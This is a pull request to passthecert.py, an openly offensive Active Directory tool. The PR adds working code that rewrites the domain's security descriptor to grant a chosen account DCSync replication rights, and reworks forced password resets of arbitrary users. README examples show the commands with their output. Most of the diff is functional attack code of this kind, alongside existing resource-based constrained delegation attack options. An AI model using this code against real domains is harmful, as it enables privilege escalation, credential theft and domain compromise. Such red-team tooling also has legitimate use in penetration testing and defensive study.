### PR TITLE
Added the logic to grant user DCSYNC rights

### DIFF
--- a/Python/README.md
+++ b/Python/README.md
@@ -47,7 +47,7 @@ Manage User:
   -elevate                              Grant target account DCSYNC rights
 
 Manage Computer:
-  -baseDN             DC=test,DC=local  Set baseDN for LDAP.If ommited, the domain part (FQDN) specified in the account parameter will be used.
+  -baseDN             DC=test,DC=local  Set baseDN for LDAP.If omitted, the domain part (FQDN) specified in the account parameter will be used.
   -computer-group     CN=Computers      Group to which the account will be added.If omitted, CN=Computers will be used,
   -domain             test.local        Target domain fqdn
   -domain-netbios     NETBIOSNAME       Domain NetBIOS name. Required if the DC has multiple domains.
@@ -60,7 +60,7 @@ RBCD attack:
   -delegate-from      DELEGATE_FROM     Attacker controlled machine account to write on the msDS-Allo[...] property (only when using `-action write`)
 
 Authentication:
-  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account
+  -dc-host hostname     Hostname of the domain controller to use. If omitted, the domain part (FQDN) specified in the account
                         parameter will be used
   -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.
   -crt user.crt         User's certificate

--- a/Python/README.md
+++ b/Python/README.md
@@ -23,50 +23,49 @@ Usage
 ```
 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
-usage: passthecert.py [-h] [-debug] [-port {389,636}] [-action [{add_computer,del_computer,modify_computer,read_rbcd,write_rbcd,remove_rbcd,flush_rbcd,forcePWDchange,whoami}]] [-account-name sAMAccountName] [-new-pass password] [-baseDN DC=test,DC=local] [-computer-group CN=Computers] [-domain test.local] [-domain-netbios NETBIOSNAME] [-computer-name COMPUTER-NAME$] [-computer-pass password]
-                      [-delegated-services cifs/srv01.domain.local,ldap/srv01.domain.local] [-delegate-to DELEGATE_TO] [-delegate-from DELEGATE_FROM] [-dc-host hostname] [-dc-ip ip] -crt user.crt -key user.key
+usage: passthecert.py [-h] [-debug] [-port {389,636}]
+                      [-action [{add_computer,del_computer,modify_computer,read_rbcd,write_rbcd,remove_rbcd,flush_rbcd,modify_user,whoami}]]
+                      [-target sAMAccountName] [-new-pass [Password]] [-elevate] [-baseDN DC=test,DC=local]
+                      [-computer-group CN=Computers] [-domain test.local] [-domain-netbios NETBIOSNAME]
+                      [-computer-name COMPUTER-NAME$] [-computer-pass password]
+                      [-delegated-services cifs/srv01.domain.local,ldap/srv01.domain.local] [-delegate-to DELEGATE_TO]
+                      [-delegate-from DELEGATE_FROM] [-dc-host hostname] [-dc-ip ip] -crt user.crt -key user.key
 
 Manage domain computers and perform RBCD attack via LDAP certificate authentication
 
-optional arguments:
+options:
   -h, --help            show this help message and exit
   -debug                Turn DEBUG output ON
   -port {389,636}       Destination port to connect to. LDAPS (via StartTLS) on 386 or LDAPS on 636.
 
 Action:
-  -action [{add_computer,del_computer,modify_computer,read_rbcd,write_rbcd,remove_rbcd,flush_rbcd,forcePWDchange,whoami}]
+  -action [{add_computer,del_computer,modify_computer,read_rbcd,write_rbcd,remove_rbcd,flush_rbcd,modify_user,whoami}]
 
-Password Reset:
-  -account-name sAMAccountName
-                        sAMAccountName of user to target.
-  -new-pass password    New password of target.
+Manage User:
+  -target             sAMaccountnames   sAMAccountName of user to target.
+  -new-pass           [Password]        New password of target.
+  -elevate                              Grant target account DCSYNC rights
 
 Manage Computer:
-  -baseDN DC=test,DC=local
-                        Set baseDN for LDAP.If ommited, the domain part (FQDN) specified in the account parameter will be used.
-  -computer-group CN=Computers
-                        Group to which the account will be added.If omitted, CN=Computers will be used,
-  -domain test.local    Target domain fqdn
-  -domain-netbios NETBIOSNAME
-                        Domain NetBIOS name. Required if the DC has multiple domains.
-  -computer-name COMPUTER-NAME$
-                        Name of computer to add.If omitted, a random DESKTOP-[A-Z0-9]{8} will be used.
-  -computer-pass password
-                        Password to set to computer. If omitted, a random [A-Za-z0-9]{32} will be used.
-  -delegated-services cifs/srv01.domain.local,ldap/srv01.domain.local
-                        Services to configure in constrained delegation to configure to the new computer (no space in the list)
+  -baseDN             DC=test,DC=local  Set baseDN for LDAP.If ommited, the domain part (FQDN) specified in the account parameter will be used.
+  -computer-group     CN=Computers      Group to which the account will be added.If omitted, CN=Computers will be used,
+  -domain             test.local        Target domain fqdn
+  -domain-netbios     NETBIOSNAME       Domain NetBIOS name. Required if the DC has multiple domains.
+  -computer-name      COMPUTER-NAME$    Name of computer to add.If omitted, a random DESKTOP-[A-Z0-9]{8} will be used.
+  -computer-pass      password          Password to set to computer. If omitted, a random [A-Za-z0-9]{32} will be used.
+  -delegated-services cifs/srv01.domain.local,ldap/srv01.domain.local Services to configure in constrained delegation to configure to the new computer (no space in the list)
 
 RBCD attack:
-  -delegate-to DELEGATE_TO
-                        Target computer account the attacker has at least WriteProperty to
-  -delegate-from DELEGATE_FROM
-                        Attacker controlled machine account to write on the msDS-Allo[...] property (only when using `-action write`)
+  -delegate-to        DELEGATE_TO       Target computer account the attacker has at least WriteProperty to
+  -delegate-from      DELEGATE_FROM     Attacker controlled machine account to write on the msDS-Allo[...] property (only when using `-action write`)
 
 Authentication:
-  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
+  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account
+                        parameter will be used
   -dc-ip ip             IP of the domain controller to use. Useful if you can't translate the FQDN.
   -crt user.crt         User's certificate
   -key user.key         User's private key
+
 ```
 
 Actions
@@ -98,7 +97,7 @@ Create a computer via LDAPS:
 
 ```console
 $ python3 passthecert.py -action add_computer -crt user.crt -key user.key -domain offsec.local -dc-ip 10.0.0.1
-Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+Impacket v0.10.0 - Copyright 2020 SecureAuth Corporation
 
 [*] Successfully added machine account DESKTOP-CKDRXFUX$ with password dzy3pjZqEH6f4Igql5dp4I5Dx8uA4PrV.
 ```
@@ -107,7 +106,7 @@ Create a computer via LDAPS with custom name/password:
 
 ```console
 $ python3 passthecert.py -action add_computer -crt user.crt -key user.key -domain offsec.local -dc-ip 10.0.0.1 -computer-name OFFSECMACHINE$ -computer-pass SheSellsSeaShellsOnTheSeaShore
-Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+Impacket v0.10.0 - Copyright 2020 SecureAuth Corporation
 
 [*] Successfully added machine account OFFSECMACHINE$ with password SheSellsSeaShellsOnTheSeaShore.
 ```
@@ -126,7 +125,7 @@ Add a delegation right via StartTLS on port 389:
 
 ```console
 $ python3 passthecert.py -action write_rbcd -crt user.crt -key user.key -domain offsec.local -dc-ip 10.0.0.1 -port 389 -delegate-to DESKTOP-CKDRXFUX$ -delegate-from SRV-MAIL$
-Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
+Impacket v0.10.0 - Copyright 2020 SecureAuth Corporation
 
 [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
 [*] Delegation rights modified successfully!
@@ -134,6 +133,25 @@ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
 [*] Accounts allowed to act on behalf of other identity:
 [*]     SRV-MAIL$    (S-1-5-21-XXXXXXXXX-YYYYYYYYYY-WWWWWWWW-1109)
 ```
+
+Change a password of a user 
+
+```console
+$ python3 passthecert.py -action modify_user -crt user.crt -key user.key -domain offsec.local -dc-ip 10.0.0.1 -target user_sam -new-pass
+Impacket v0.10.0 - Copyright 2020 SecureAuth Corporation
+
+[*] Successfully changed kpayne password to: ZqIrfZdt02OIq5Ek0ZZPcQKRWKEMEOKB
+```
+
+Elevate a user fpr DCSYNC
+
+```console
+$ python3 passthecert.py -action modify_user -crt user.crt -key user.key -domain offsec.local -dc-ip 10.0.0.1 -target user_sam -elevate
+Impacket v0.10.0 - Copyright 2020 SecureAuth Corporation
+
+[*] Granted user 'user_sam' DCSYNC rights!
+```
+
 
 Credits
 -------

--- a/Python/passthecert.py
+++ b/Python/passthecert.py
@@ -529,7 +529,7 @@ if __name__ == '__main__':
 
     group = parser.add_argument_group('Manage Computer')
     group.add_argument('-baseDN', action='store', metavar='DC=test,DC=local', help='Set baseDN for LDAP.'
-                                                                                    'If ommited, the domain part (FQDN) '
+                                                                                    'If omitted, the domain part (FQDN) '
                                                                                     'specified in the account parameter will be used.')
     group.add_argument('-computer-group', action='store', metavar='CN=Computers', help='Group to which the account will be added.'
                                                                                         'If omitted, CN=Computers will be used,')
@@ -550,7 +550,7 @@ if __name__ == '__main__':
 
     group = parser.add_argument_group('Authentication')
     group.add_argument('-dc-host', action='store',metavar = "hostname",  help='Hostname of the domain controller to use. '
-                                                                              'If ommited, the domain part (FQDN) '
+                                                                              'If omitted, the domain part (FQDN) '
                                                                               'specified in the account parameter will be used')
     group.add_argument('-dc-ip', action='store',metavar = "ip",  help='IP of the domain controller to use. '
                                                                       'Useful if you can\'t translate the FQDN.')
@@ -623,7 +623,7 @@ if __name__ == '__main__':
             elif options.new_pass is not None:
                 manage.changePWD(options.new_pass)
             else:
-                logging.critical('User modification option (-elevate|-changePWD) needed!')
+                logging.critical('User modification option (-elevate|-new-pass) needed!')
 
         elif options.action in ('add_computer','del_computer','modify_computer', 'whoami'):
             manage = ManageComputer(ldapConn, options)

--- a/Python/passthecert.py
+++ b/Python/passthecert.py
@@ -27,8 +27,9 @@
 
 from impacket import version
 from impacket.examples import logger
-
 from impacket.ldap import ldaptypes
+from impacket.uuid import string_to_bin
+
 import ldapdomaindump
 
 import ldap3
@@ -38,6 +39,7 @@ import sys
 import string
 import random
 import ssl
+import copy
 
 def create_empty_sd():
     sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
@@ -57,9 +59,8 @@ def create_empty_sd():
     sd['Dacl'] = acl
     return sd
 
-
 # Create an ALLOW ACE with the specified sid
-def create_allow_ace(sid):
+def create_allow_ace(sid, guid_str=False):
     nace = ldaptypes.ACE()
     nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
     nace['AceFlags'] = 0x00
@@ -68,6 +69,12 @@ def create_allow_ace(sid):
     acedata['Mask']['Mask'] = 983551  # Full control
     acedata['Sid'] = ldaptypes.LDAP_SID()
     acedata['Sid'].fromCanonical(sid)
+    if guid_str:
+        acedata['ObjectType'] = string_to_bin(guid_str)
+        acedata['ObjectTypeLen'] = len(string_to_bin(guid_str))
+        acedata['InheritedObjectTypeLen'] = 0
+        acedata['InheritedObjectType'] = b''
+    acedata['Flags'] = 1
     nace['Ace'] = acedata
     return nace
 
@@ -263,16 +270,13 @@ class RBCD(object):
             return '[Could not resolve SID]', '[Could not resolve SID]'
 
 
-class ManageUserPWD:
+class ManageUser:
+    """docstring for ManageUser"""
     def __init__(self, ldapConn, cmdLineOptions):
         self.ldapConn = ldapConn
-        self.__accountName = cmdLineOptions.account_name
-        self.__newPassword = cmdLineOptions.new_pass
+        self.__accountName = cmdLineOptions.target
         self.__domain = cmdLineOptions.domain
         self.__baseDN = cmdLineOptions.baseDN
-        
-        if self.__newPassword is None:
-            self.__newPassword = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))
         
         if self.__baseDN is None:
              # Create the baseDN
@@ -286,35 +290,77 @@ class ManageUserPWD:
         if not '.' in self.__domain:
             logging.warning('\'%s\' doesn\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)
 
-    def LDAPUserExists(self, accountName):
-        return self.LDAPGetUser(accountName)
-
-    def LDAPGetUser(self, accountName):
-        self.ldapConn.search(self.__baseDN, '(sAMAccountName=%s)' % ldap3.utils.conv.escape_filter_chars(accountName))
-        try:
-            dn = self.ldapConn.entries[0].entry_dn
-            return dn
-        except IndexError:
-            logging.error('User not found in LDAP: %s' % accountName)
-            return False
-
-    def changePW(self):
         if not self.LDAPUserExists(self.__accountName):
             raise Exception("sAMAccountName %s not found in %s!" % (self.__accountName, self.__baseDN))
 
-        targetDN = self.LDAPGetUser(self.__accountName)
-        res = self.ldapConn.modify(targetDN, {'unicodePwd': [(ldap3.MODIFY_REPLACE, ['"{}"'.format(self.__newPassword).encode('utf-16-le')])]})
+        self.__targetDN, self.__targetSID = self.LDAPGetUser(self.__accountName)
+
+    def LDAPUserExists(self, accountName):
+        res, _ = self.LDAPGetUser(accountName)
+        return res
+
+    def LDAPGetUser(self, accountName):
+        self.ldapConn.search(self.__baseDN, \
+                             '(sAMAccountName=%s)' % ldap3.utils.conv.escape_filter_chars(accountName), \
+                             attributes=['objectSid'])
+        try:
+            dn = self.ldapConn.entries[0].entry_dn
+            sid = ldap3.protocol.formatters.formatters.format_sid(self.ldapConn.entries[0]['objectSid'].raw_values[0])
+            return dn, sid
+        except IndexError:
+            logging.error('User not found in LDAP: %s' % accountName)
+            return False, ''
+
+    def elevate(self, forestDN=None): # implementation was inspired by @skelsec's `msldap` code  
+        if forestDN is None:                   
+            forestDN = self.__baseDN
+        
+        res = self.ldapConn.search(search_base=self.__baseDN, \
+                                   search_filter=f'(distinguishedName={forestDN})', \
+                                   attributes=['nTSecurityDescriptor'])
+        if res is None:
+            logging.error('Failed to get forest\'s SD')
+
+        baseDN_sd = self.ldapConn.entries[0].entry_raw_attributes
+        if baseDN_sd['nTSecurityDescriptor'] == []:
+            raise Exception("User doesn't have right read nTSecurityDescriptor!")
+
+        sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=baseDN_sd['nTSecurityDescriptor'][0])
+        new_sd = copy.deepcopy(sd)
+
+        for guid in ['1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', \
+                     '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', \
+                     '89e95b76-444d-4c62-991a-0facbeda640c']:
+            new_sd['Dacl'].aces.append(create_allow_ace(self.__targetSID, guid))
+
+        res = self.ldapConn.modify(forestDN, \
+                                   {'nTSecurityDescriptor': [ldap3.MODIFY_REPLACE, [new_sd.getData()]]})
         if not res:
             if self.ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
-                raise Exception("User doesn't have right to modify %s!" % (targetDN))
-            elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_NO_SUCH_OBJECT:
-                raise Exception("Target DN '%s' is not correct!" % (targetDN))
+                raise Exception("User doesn't have right to modify %s!" % (self.__targetDN))
             elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM:
-                raise Exception("Unwilling to Perform: %s" % (self.ldapConn.result['message']))               
+                raise Exception("Unwilling to Perform: %s" % (self.ldapConn.result['message']))
+            else:
+                raise Exception(str(ldapConn.result))
+        else:
+            logging.info("Granted user '%s' DCSYNC rights!" % (self.__accountName))
+
+    def changePWD(self, newPWD):
+        if newPWD is False:
+            newPWD = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))
+        res = self.ldapConn.modify(self.__targetDN, \
+                                   {'unicodePwd': [(ldap3.MODIFY_REPLACE, ['"{}"'.format(newPWD).encode('utf-16-le')])]})
+        if not res:
+            if self.ldapConn.result['result'] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
+                raise Exception("User doesn't have right to modify %s!" % (self.__targetDN))
+            elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_NO_SUCH_OBJECT:
+                raise Exception("Target DN '%s' is not correct!" % (self.__targetDN))
+            elif self.ldapConn.result['result'] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM:
+                raise Exception("Password complexity not met. Unwilling to Perform: %s" % (self.ldapConn.result['message']))               
             else:
                 raise Exception(str(self.ldapConn.result))
         else:
-            logging.info("Successfully changed %s password to: %s" % (self.__accountName, self.__newPassword))
+            logging.info("Successfully changed %s password to: %s" % (self.__accountName, newPWD))
 
 
 class ManageComputer:
@@ -473,11 +519,12 @@ if __name__ == '__main__':
                        help='Destination port to connect to. LDAPS (via StartTLS) on 386 or LDAPS on 636.')
 
     group = parser.add_argument_group('Action')
-    group.add_argument('-action', choices=['add_computer', 'del_computer', 'modify_computer', 'read_rbcd', 'write_rbcd', 'remove_rbcd', 'flush_rbcd', 'forcePWDchange', 'whoami'], nargs='?', default='whoami')
+    group.add_argument('-action', choices=['add_computer', 'del_computer', 'modify_computer', 'read_rbcd', 'write_rbcd', 'remove_rbcd', 'flush_rbcd', 'modify_user', 'whoami'], nargs='?', default='whoami')
 
-    group = parser.add_argument_group('Password Reset')
-    group.add_argument('-account-name', action='store', metavar='sAMAccountName', help='sAMAccountName of user to target.')
-    group.add_argument('-new-pass', action='store', metavar='password', help='New password of target.')
+    group = parser.add_argument_group('Manage User')
+    group.add_argument('-target', action='store', metavar='sAMAccountName', help='sAMAccountName of user to target.')
+    group.add_argument('-new-pass',  action='store', metavar='Password', help='New password of target.', const=False, nargs='?')
+    group.add_argument('-elevate', action='store_true', help='Grant target account DCSYNC rights')
 
     group = parser.add_argument_group('Manage Computer')
     group.add_argument('-baseDN', action='store', metavar='DC=test,DC=local', help='Set baseDN for LDAP.'
@@ -564,13 +611,20 @@ if __name__ == '__main__':
             # An EXTERNAL bind is not allowed, and the bind will be rejected with an error."
             # Using bind() function will raise an error, we just have to open() the connection
             ldapConn.open()
-        
-        if options.action in ('forcePWDchange'):
-            manage = ManageUserPWD(ldapConn, options)
-            manage.changePW()
-            sys.exit(1)
 
-        if options.action in ('add_computer','del_computer','modify_computer', 'whoami'):
+        if options.action in ('modify_user'):
+            if options.target is None:
+                logging.critical('-target is required !')
+                sys.exit(1)
+            manage = ManageUser(ldapConn, options)
+            if options.elevate:
+                manage.elevate()
+            elif options.new_pass is not None:
+                manage.changePWD(options.new_pass)
+            else:
+                logging.critical('User modification option (-elevate|-changePWD) needed!')
+
+        elif options.action in ('add_computer','del_computer','modify_computer', 'whoami'):
             manage = ManageComputer(ldapConn, options)
             if options.action == 'add_computer':
                 manage.add_computer(options.delegated_services)


### PR DESCRIPTION
This PR implements the `elevate` attack in python.

POC:

![image](https://user-images.githubusercontent.com/7869385/216791995-81f0f1e6-4885-4e3a-a9d4-d22f49c04b09.png)


This commit also changed the cli syntax.
All user related ldap changes are initiated with `-modify-user` followd by either `-new-pass` or `-elevate`.